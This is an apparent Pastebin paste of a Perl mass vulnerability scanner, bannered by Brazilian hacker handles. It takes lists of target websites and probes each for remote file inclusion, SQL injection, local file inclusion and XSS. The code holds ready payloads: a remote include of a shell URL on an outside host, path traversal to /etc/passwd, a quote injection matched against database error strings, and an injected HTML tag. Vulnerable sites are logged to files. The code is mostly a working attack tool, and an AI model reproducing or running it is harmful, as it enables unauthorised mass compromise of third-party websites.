API tools faq
paste
Advertisement
rutera

Multiple Scan

rutera
Jan 8th, 2015
247
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 5.46 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use HTTP::Request;
  4. use LWP::Simple;
  5.  
  6. inicio:
  7. $sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
  8. system("$cmd");
  9.  
  10. print "###########################################################\n";
  11. print "#    MULTIPLE SCAN - Scanner Para RFI, SQL, LFI e XSS.    #\n";
  12. print "#         c0d3d by DD3str0y3r, Ed1t3d by CyraxzZ.         #\n";
  13. print "#                 :::Brazilians c0d3rs:::                 #\n";
  14. print "# Gr33tz: Dr4k3, _Mlk_, Z4i0n, datalock, M0nt3r, G3N3SIS. #\n";
  15. print "###########################################################\n\n";
  16.  
  17. print "Menu:\n\n";
  18. print "1. Testar Lista em RFI\n";
  19. print "2. Testar Lista em SQL\n";
  20. print "3. Testar Lista em LFI\n";
  21. print "4. Testar Lista em XSS\n\n";
  22. print "Opcao: ";
  23. my $opcao=<STDIN>;
  24. if ($opcao==1){&RFI}
  25. if ($opcao==2){&SQL}
  26. if ($opcao==3){&LFI}
  27. if ($opcao==4){&XSS}
  28.  
  29. #######
  30. # RFI #
  31. #######
  32.  
  33. sub RFI {
  34.  
  35. print "\n#######\n";
  36. print "# RFI #\n";
  37. print "#######\n";
  38. print "\nDigite o nome da lista de sites:\n";
  39. print "Ex: Sites.txt, Lista.txt etc...\n\n";
  40. print "Os sites dentro da lista deve estar da seguinte forma:\n";
  41. print "http://www.site.com.br/index.php?pg=\n\n";
  42. chomp($lista = <STDIN>);
  43.  
  44. system("$cmd");
  45.  
  46. print "->Pesquisando RFI... Aguarde...\n\n";
  47.  
  48. open(LISTA, "$lista");
  49. while(<LISTA>) {
  50.  
  51. my $lista = $_;
  52. chomp $lista;
  53.  
  54. my $rfi= "http://dd3str0y3r.webs.com/cmd?";
  55.  
  56. my $url=$lista.$rfi;
  57.  
  58. my $req=HTTP::Request->new(GET=>$url);
  59. my $ua=LWP::UserAgent->new();
  60. $ua->timeout(15);
  61. my $resposta=$ua->request($req);
  62.  
  63. if($resposta->content =~ /D3str0y/){
  64. print "[+] Encontrado -> $url\n";
  65. open(a, ">>LISTA_RFI.txt.txt");
  66. print a "$url\n";
  67. close(a);
  68.   }else{ print "[-] Nao Encontrado <- $url\n"; }
  69. }
  70. print "\nCaso houver resultados eles serao salvos em LISTA_RFI.txt\n";
  71. print "\nAperte ENTER para voltar ao menu principal...\n";
  72. <STDIN>;
  73. goto inicio;
  74. }
  75.  
  76. #######
  77. # SQL #
  78. #######
  79.  
  80. sub SQL {
  81.  
  82. print "\n#######\n";
  83. print "# SQL #\n";
  84. print "#######\n";
  85. print "\nDigite o nome da lista de sites:\n";
  86. print "Ex: Sites.txt, Lista.txt etc...\n\n";
  87. print "Os sites dentro da lista deve estar da seguinte forma:\n";
  88. print "http://www.site.com.br/noticias.php?id=99\n";
  89. print "Ou:\n";
  90. print "http://www.site.com.br/noticias.asp?id=99\n\n";
  91. chomp($lista = <STDIN>);
  92.  
  93. system("$cmd");
  94.  
  95. print "->Pesquisando SQL... Aguarde...\n\n";
  96.  
  97. open(LISTA, "$lista");
  98. while(<LISTA>) {
  99.  
  100. my $lista = $_;
  101. chomp $lista;
  102.  
  103. my $sql="'";
  104.  
  105. my $url=$lista.$sql;
  106.  
  107. my $req=HTTP::Request->new(GET=>$url);
  108. my $ua=LWP::UserAgent->new();
  109. $ua->timeout(15);
  110. my $resposta=$ua->request($req);
  111.  
  112. if($resposta->content =~ /You have an error in your SQL syntax/ ||
  113. $resposta->content =~ /MySQL server version/ ||
  114. $resposta->content =~ /Syntax error converting the nvarchar value/ ||
  115. $resposta->content =~ /Unclosed quotation mark before/ ||
  116. $resposta->content =~ /SQL Server error/ ||
  117. $resposta->content =~ /JET/){
  118. print "[+] Encontrado -> $url\n";
  119. open(a, ">>LISTA_SQL.txt");
  120. print a "$url\n";
  121. close(a);
  122. }else{
  123. print "[-] Nao Encontrado <- $url\n";
  124. }}
  125. print "\nCaso houver resultados eles serao salvos em LISTA_SQL.txt\n";
  126. print "\nAperte ENTER para voltar ao menu principal...\n";
  127. <STDIN>;
  128. goto inicio;
  129. }
  130.  
  131. #######
  132. # LFI #
  133. #######
  134.  
  135. sub LFI {
  136.  
  137. print "\n#######\n";
  138. print "# LFI #\n";
  139. print "#######\n";
  140. print "\nDigite o nome da lista de sites:\n";
  141. print "Ex: Sites.txt, Lista.txt etc...\n\n";
  142. print "Os sites dentro da lista deve estar da seguinte forma:\n";
  143. print "http://www.site.com.br/index.php?pg=\n\n";
  144. chomp($lista = <STDIN>);
  145.  
  146. system("$cmd");
  147.  
  148. print "->Pesquisando LFI... Aguarde...\n\n";
  149.  
  150. open(LISTA, "$lista");
  151. while(<LISTA>) {
  152.  
  153. my $lista = $_;
  154. chomp $lista;
  155.  
  156. @lfi= ('/etc/passwd',
  157.        '/etc/passwd%00',
  158.        '../../../../../../../../../../../../../../../etc/passwd',
  159.        '../../../../../../../../../../../../../../../etc/passwd%00');
  160.  
  161. foreach $bug(@lfi){
  162.  
  163. my $url=$lista.$bug;
  164.  
  165. my $req=HTTP::Request->new(GET=>$url);
  166. my $ua=LWP::UserAgent->new();
  167. $ua->timeout(15);
  168. my $response=$ua->request($req);
  169.  
  170. if($response->content =~ /root:x:/ ||
  171. $response->content =~ /root:*:/ ||
  172. $response->content =~ /root:!:/){
  173. print "[+] Encontrado -> $url\n";
  174. open(a, ">>LISTA_LFI.txt");
  175. print a "$url\n";
  176. close(a);
  177. }else{
  178. print "[-] Nao Encontrado <- $url\n";}
  179.   }
  180. }
  181. print "\nCaso houver resultados eles serao salvos em LISTA_LFI.txt\n";
  182. print "\nAperte ENTER para voltar ao menu principal...\n";
  183. <STDIN>;
  184. goto inicio;
  185. }
  186.  
  187. #######
  188. # XSS #
  189. #######
  190.  
  191. sub XSS {
  192.  
  193. print "\n#######\n";
  194. print "# XSS #\n";
  195. print "#######\n";
  196. print "\nDigite o nome da lista de sites:\n";
  197. print "Ex: Sites.txt, Lista.txt etc...\n\n";
  198. print "Os sites dentro da lista deve estar da seguinte forma:\n";
  199. print "http://www.site.com.br/index.php?pg=\n\n";
  200. chomp($lista = <STDIN>);
  201.  
  202. system("$cmd");
  203.  
  204. print "->Pesquisando XSS... Aguarde...\n\n";
  205.  
  206. open(LISTA, "$lista");
  207. while(<LISTA>) {
  208.  
  209. my $lista = $_;
  210. chomp $lista;
  211.  
  212. my $xss= ('s[1]"><h1>XSS<?');
  213.  
  214. my $url=$lista.$xss;
  215.  
  216. my $req=HTTP::Request->new(GET=>$url);
  217. my $ua=LWP::UserAgent->new();
  218. $ua->timeout(15);
  219. my $response=$ua->request($req);
  220.  
  221. if($response->content =~ /XSS/){
  222. print "[+] Encontrado -> $url\n";
  223. open(a, ">>LISTA_XSS.txt");
  224. print a "$url\n";
  225. close(a);
  226. }else{
  227. print "[-] Nao Encontrado <- $url\n"; }
  228. }
  229. print "\nCaso houver resultados eles serao salvos em LISTA_XSS.txt\n";
  230. print "\nAperte ENTER para voltar ao menu principal...\n";
  231. <STDIN>;
  232. goto inicio;
  233. }
  234.  
  235. #27/12/2008
  236. #EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!